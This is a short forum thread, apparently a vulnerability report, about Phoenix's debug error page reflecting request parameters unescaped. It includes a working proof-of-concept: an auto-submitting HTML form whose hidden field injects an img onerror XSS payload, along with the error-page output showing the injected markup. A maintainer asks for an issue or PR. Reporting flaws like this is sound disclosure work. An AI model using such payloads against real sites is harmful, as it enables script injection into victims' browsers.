Phoenix `debug_errors` vulnerable to XSS

i-n-g-m-a-r · March 13, 2025, 9:02am

When debug_errors: true javascript can be executed.

<html>
  <body>
    <form id="xss" action="https://domain.com/NateMail.php" method="POST">
      <input type="hidden" name="recipient" value="hhhhhh&lt;&#47;textarea&gt;&lt;img&#47;src&#61;x&#32;onerror&#61;alert&#40;'Identied_as_CVE-2019-13392'&#41;&gt;" />
    </form>
    <script>
      document.getElementById('xss').submit();
    </script>
  </body>
</html>

Error reporting allows javascript to be executed.

<div class="code-explorer">
    <textarea class="hidden-contents" role="copy-contents"># Plug.CSRFProtection.InvalidCSRFTokenError at POST /NateMail.php

Exception:

    ** (Plug.CSRFProtection.InvalidCSRFTokenError) invalid CSRF (Cross Site Request Forgery) token, please make sure that:
    
      * The session cookie is being sent and session is loaded
      * The request include a valid '_csrf_token' param or 'x-csrf-token' header
        (plug 1.14.0) lib/plug/csrf_protection.ex:316: Plug.CSRFProtection.call/2

[etc]

## Connection details

### Params

    %{"path" => ["NateMail.php"], "recipient" => "hhhhhh</textarea><img/src=x onerror=alert('Identied_as_CVE-2019-13392')>"}

[etc]

josevalim · March 13, 2025, 6:36pm

Could you please open up an issue or submit a PR? That would be part of the GitHub - elixir-plug/plug: Compose web applications with functions. This is a dev only mode but it would be good to get it addressed anyway. Thank you.